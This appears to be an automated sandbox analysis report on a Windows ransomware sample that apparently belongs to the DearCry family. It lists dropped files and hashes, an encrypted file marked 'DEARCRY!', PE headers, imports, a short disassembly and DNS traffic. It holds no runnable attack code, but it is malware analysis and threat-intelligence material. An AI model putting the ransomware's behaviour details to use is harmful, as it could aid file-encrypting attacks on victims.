                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Cortana_cw5n1h2txyewy!CortanaUI
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_HolographicFirstRun_cw5n1h2txyewy!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_XboxApp_8wekyb3d8bbwe!Microsoft_XboxApp
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\~ortanaUnifiedTileModelCache.tmp
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Temp\{530415C5-2B45-4B70-85E3-40C804FDC326}.png
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):5796
                                                            Entropy (8bit):7.8707072980628645
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:00E5FCFD833151F7CBDE607E2F7AFEB4
                                                            SHA1:55839875C0947AAFEBFF53D22CCC5DAD29FE3563
                                                            SHA-256:B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035
                                                            SHA-512:F056777A1987C3BECDC217BDC2D82E6AA41086D38FDDAA45C42F1726B6F7B7616A10918081650E825A724464EF148B669BC258D38A62E0DE8642E2607A0B0DE7
                                                            Malicious:false
                                                            Preview: .PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a....NIDATx^..M.U...2....`0..X0(6.[#.b.d..Y..\..fV._....<."....^......)..F.EF.i.yp.........6.`O.n.q.O}o..:.t..s.Us...z8u................................................................y..........8......g.......Tt}.]....c.+fq....z"..4.UH.PH.<J8MK.z.8....l.).......W.O.G.Q.VN.p.h..6...C..AV...Rh...U.p8.7..i.....o...'..A.~e.e.c=.g..G.z.;.>{..`S.}.:S...AV.FSau....c..R.m|...k...g.........l.....p.lg.q...Q ..4.f.\:...O...VW.,....Q).Z.f.e[.)..SWT..Y.jgZ....Y.../......=Tw.$.[.P..}.`S.SaF... .[..=.^....T.w.....N.d.jS....4.JMav......,7.....7...n...{\x.@.@k.7.......@..."..Y.\...S...u$.F.z...y...P... K..uTx).i.k.~.^..w.BL.v...[.M....z&. K.[...=....,..C...6....B.w..n.I.h,.M.A..A.......X>.?..TU..~3..Zb.....0u.w.....Rh........Z"..yr....CK(b.XZ......hL...A6..GU`....`i..h'.q....w..A6kn....x.........;a.uh3D..[J.....4.....,W../........%.3@.M..F....d.e...v... k./...{..... ...F.o..]......2.XK.....\^..|G..o.0
                                                            C:\bootTel.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):80
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D1D9ABE750525B2B6C74A5291F52BAA7
                                                            SHA1:2D5D85DFD3361150E8BEBE7CB730C08258206BA6
                                                            SHA-256:D9B1F3E2C6D528668A73F22575C44ED9F98D9C684964761B621417EFD80D7A60
                                                            SHA-512:B2BF8578EEAB1AAEEE7E51DB684ECCFDF2AD7048142E47A01646D26A3137528D0721362456A1333630F9ED7B61EC8A9B1F4EF2C40C35DEFFBEA635ACBE170B07
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\bootTel.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.326471208441697
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FCA918B74259192D685871D88186683C
                                                            SHA1:7FD59AF94921C07BBB17407F10263FEDEB6F3D90
                                                            SHA-256:877A2EFDCE5306D8592380A0C8669BC3B23B3EF440FE260F841F82FD7E1ADB67
                                                            SHA-512:C09FDD8CBDEE1F5EEB11090EEA55FA05B8B0DD120E476BABEBCB524A9E50AD10E3B06083B1D78AC4860AF1DCFB8E507C0ACA899CC96B1946A6C1F3413B3CC976
                                                            Malicious:false
                                                            Preview: DEARCRY!....;.;....g.%<..Q.K...yF.OG.....<m.....BdSB....b.;`.UJ......!V.y..t{......I|yO+..../.a.M!.l.xT.*....!b.B..U....d...6`...R]..`...b:.....\y....XB7...."3.|Uy...C...^H.79....fG..~.0...$Z....bK...Uci..$9`..Gm....4.}..h3...t..........u....^..5i..zyK ~....P........6j..@...3..Z..)..B.............O.0.....N6......I ..X.....8%G..M.9%G.0...`v.o.....f.Cn

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.994272279602838
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:bkscEXd86b.exe
                                                            File size:1322496
                                                            MD5:cdda3913408c4c46a6c575421485fa5b
                                                            SHA1:56eec7392297e7301159094d7e461a696fe5b90f
                                                            SHA256:e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6
                                                            SHA512:666b7419adaa2fba34e53416fc29cac92bbbe36d9fae57bae00001d644f35484df9b1e44a516866b000b8ab04cd2241414fe0692e1a5b6f36d540ed13a45448a
                                                            SSDEEP:24576:C5Nv2SkWFP/529IC8u2bAs0NIzkQS+KpPbEasBY2iKDl1fpxkLVZgMCS+:oB70s9yjE62iIl1fpxkLVZgMC3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m..dm...m..um...m..cm...m...m...m.:.m...m...m...m..jm...m..qm...mRich...m........................PE..L...1.E`...

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4db796
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x6045C431 [Mon Mar 8 06:29:05 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:f8b8e20e844ccd50a8eb73c2fca3626d

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F9C5888D069h
                                                            jmp 00007F9C58883149h
                                                            push ebp
                                                            mov ebp, esp
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [ebp+0Ch]
                                                            mov ecx, dword ptr [ebp+10h]
                                                            mov edi, dword ptr [ebp+08h]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F9C588832AAh
                                                            cmp edi, eax
                                                            jc 00007F9C5888344Ah
                                                            cmp ecx, 00000100h
                                                            jc 00007F9C588832C1h
                                                            cmp dword ptr [0073C7A4h], 00000000h
                                                            je 00007F9C588832B8h
                                                            push edi
                                                            push esi
                                                            and edi, 0Fh
                                                            and esi, 0Fh
                                                            cmp edi, esi
                                                            pop esi
                                                            pop edi
                                                            jne 00007F9C588832AAh
                                                            pop esi
                                                            pop edi
                                                            pop ebp
                                                            jmp 00007F9C5888D13Ah
                                                            test edi, 00000003h
                                                            jne 00007F9C588832B7h
                                                            shr ecx, 02h
                                                            and edx, 03h
                                                            cmp ecx, 08h
                                                            jc 00007F9C588832CCh
                                                            rep movsd
                                                            jmp dword ptr [004DB914h+edx*4]
                                                            nop
                                                            mov eax, edi
                                                            mov edx, 00000003h
                                                            sub ecx, 04h
                                                            jc 00007F9C588832AEh
                                                            and eax, 03h
                                                            add ecx, eax
                                                            jmp dword ptr [004DB828h+eax*4]
                                                            jmp dword ptr [004DB924h+ecx*4]
                                                            nop
                                                            jmp dword ptr [004DB8A8h+ecx*4]
                                                            nop
                                                            cmp byte ptr [eax-479BFFB3h], bh
                                                            dec ebp
                                                            add byte ptr [eax+23004DB8h], cl
                                                            ror dword ptr [edx-75F877FAh], 1
                                                            inc esi
                                                            add dword ptr [eax+468A0147h], ecx
                                                            add al, cl
                                                            jmp 00007F9C5ACFBAA7h
                                                            add esi, 03h
                                                            add edi, 03h
                                                            cmp ecx, 08h
                                                            jc 00007F9C5888326Eh
                                                            rep movsd
                                                            jmp dword ptr [00000014h+edx*4]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [LNK] VS2008 build 21022
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13009c0x78.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x33e0000x1b4.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x33f0000x9164.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xf02900x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x12f8980x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0xf00000x24c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000xee6620xee800False0.569355386858data7.0691412793IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rdata0xf00000x40df60x40e00False0.500060211946data6.12897231389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x1310000x20c9040x6600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x33e0000x1b40x200False0.48828125data5.10871729953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x33f0000xc94e0xca00False0.44395884901data5.47413035767IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_MANIFEST0x33e0580x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetCurrentProcessId, CloseHandle, LoadLibraryA, VirtualAlloc, GetProcAddress, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InterlockedCompareExchange, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedExchangeAdd, GetModuleHandleW, GetVersion, MultiByteToWideChar, WriteFile, GetFileType, GetStdHandle, GetSystemTimeAsFileTime, DeleteFiber, GetTickCount, QueryPerformanceCounter, GlobalMemoryStatus, WideCharToMultiByte, ConvertFiberToThread, GetConsoleMode, SetConsoleMode, ReadConsoleA, ReadConsoleW, GetEnvironmentVariableW, LoadLibraryW, HeapFree, FileTimeToSystemTime, FileTimeToLocalFileTime, GetLastError, DeleteFileA, Sleep, ExitProcess, GetCommandLineA, HeapReAlloc, SetConsoleCtrlHandler, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, GetFullPathNameA, GetCurrentDirectoryA, GetModuleFileNameA, SetHandleCount, GetStartupInfoA, SetFilePointer, ReadFile, RtlUnwind, GetConsoleCP, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, SetLastError, LCMapStringA, LCMapStringW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetModuleHandleA, FlushFileBuffers, SetStdHandle, HeapSize, GetTimeZoneInformation, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CompareStringA, CompareStringW, SetEnvironmentVariableA, CreateFileW, SetEndOfFile, GetProcessHeap, VirtualFree, GetCurrentProcess, FreeLibrary, CreateFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, FindFirstFileA, lstrcatA, GetFileAttributesA, GetDriveTypeA, GetLogicalDrives, HeapAlloc, lstrcpynA
                                                            ADVAPI32.dllOpenServiceA, CryptDecrypt, CryptCreateHash, CryptSetHashParam, CryptSignHashW, CryptDestroyHash, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptDestroyKey, CryptEnumProvidersW, CryptAcquireContextW, CryptGenRandom, CryptReleaseContext, RegisterEventSourceW, ReportEventW, DeregisterEventSource, CloseServiceHandle, StartServiceCtrlDispatcherA, DeleteService, RegisterServiceCtrlHandlerA, SetServiceStatus, OpenSCManagerA
                                                            WS2_32.dllclosesocket, recv, WSASetLastError, send, WSAGetLastError, WSACleanup
                                                            USER32.dllGetProcessWindowStation, MessageBoxW, GetUserObjectInformationW
                                                            CRYPT32.dllCertCloseStore, CertFreeCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertOpenStore, CertGetCertificateContextProperty, CertDuplicateCertificateContext

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Network Port Distribution

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 11, 2021 23:56:48.907344103 CET53506208.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:48.921331882 CET6493853192.168.2.38.8.8.8
                                                            Mar 11, 2021 23:56:48.981595993 CET53649388.8.8.8192.168.2.3
                                                            Mar 11, 2021 23:56:49.764488935 CET6015253192.168.2.38.8.8.8
